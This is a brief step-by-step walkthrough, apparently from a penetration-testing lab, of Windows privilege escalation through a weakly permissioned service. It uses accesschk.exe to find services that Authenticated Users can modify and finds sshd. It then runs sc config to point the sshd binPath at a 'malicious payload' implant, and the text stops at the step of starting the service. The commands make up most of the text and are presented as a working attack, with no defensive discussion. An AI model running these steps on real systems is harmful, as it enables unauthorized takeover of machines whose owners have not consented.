First: Let’s find the services that are modifiable by everyone

accesschk.exe -accepteula -wuvc "Everyone" *

No matching results

Let’s Try services we can modify as users

accesschk.exe -accepteula -wuvc "Users" *

No matching results

Let’s Try services we can modify as Authenticated Users

accesschk.exe -accepteula -wuvc "Authenticated Users" *

And we have found the sshd services

Second: View Service stat

sc query sshd

Third: Modify service path to point to our malicious payload

sc config sshd binPath= "C:\\Users\\IEUser\\Desktop\\LPE\\implant\\implantsrv.exe"

Fourth: Start the service